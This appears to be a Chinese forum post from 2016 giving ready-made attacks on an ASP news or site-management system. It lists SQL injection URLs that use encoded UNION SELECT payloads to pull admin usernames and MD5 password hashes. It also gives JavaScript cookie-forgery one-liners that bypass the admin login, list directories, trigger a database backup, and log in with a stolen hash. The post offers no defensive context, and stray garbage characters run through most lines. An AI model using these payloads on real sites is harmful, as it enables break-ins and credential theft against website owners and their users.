一、注入( r, j. m0 h7 `4 @7 D
1、news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2( J7 P5 n! ^$ `) L6 f" j8 ?
) B! i8 ^" p3 x6 C# W! J7 s
2、第一步:javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1");location.href="admin_chk.asp"
/ ~ D! X: ?0 `) {第二步:请求:admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin6 A! a3 k0 T# N( }/ j
可得到用户名和MD5加密码的密码。
! f; l- P. x5 T0 L- f9 X% ` ] t3 j0 y9 N1 U% D2 Y5 P
二、cookies欺骗
, @+ G0 u; \& O) F1 F: z
. N. V) ?6 I+ v9 ]1、直接进后台,适用于较低版本,一般login.asp和admin_index.asp在同一目录下的版本有此漏洞. ) ]5 B2 ?. W4 e) M3 `
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));alert(document.cookie="adminpass="+escape("'or'='or'"));alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"( X# h; T" P) T5 x
9 H+ V3 p# H4 I. l; ?) i- A2、列目录. 5 D) y- @8 D9 @& i
javascript:alert(document.cookie="admindj="+escape("1"));location.href="edit/admin_uploadfile.asp?dir=.."
2 D+ a0 c7 j0 J* j4 ?1 l+ ?, Y# \& p+ R
3、数据库备份(适用性好像比较低.) 2 ?0 |5 `4 ^8 }6 ~ A- W$ H% c- x
javascript:alert(document.cookie="admindj="+escape("1"));location.href="admin_db_backup.asp?action=backupdata"
' X0 V. h0 ^* j$ O! L. h" |" S7 v: q1 N I' V* C
4、得到MD5密码解不了密进后台方法8 Q- W4 w3 Q v' U$ z& e. w# ]( K
javascript:alert(document.cookie="adminuser="+escape("用户名")); alert(document.cookie="adminpass="+escape("md5密码")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp"2 E0 A# o3 A# A0 \1 h5 G$ @& z
|
发表于 2016-5-11 14:55:08
收藏
支持
反对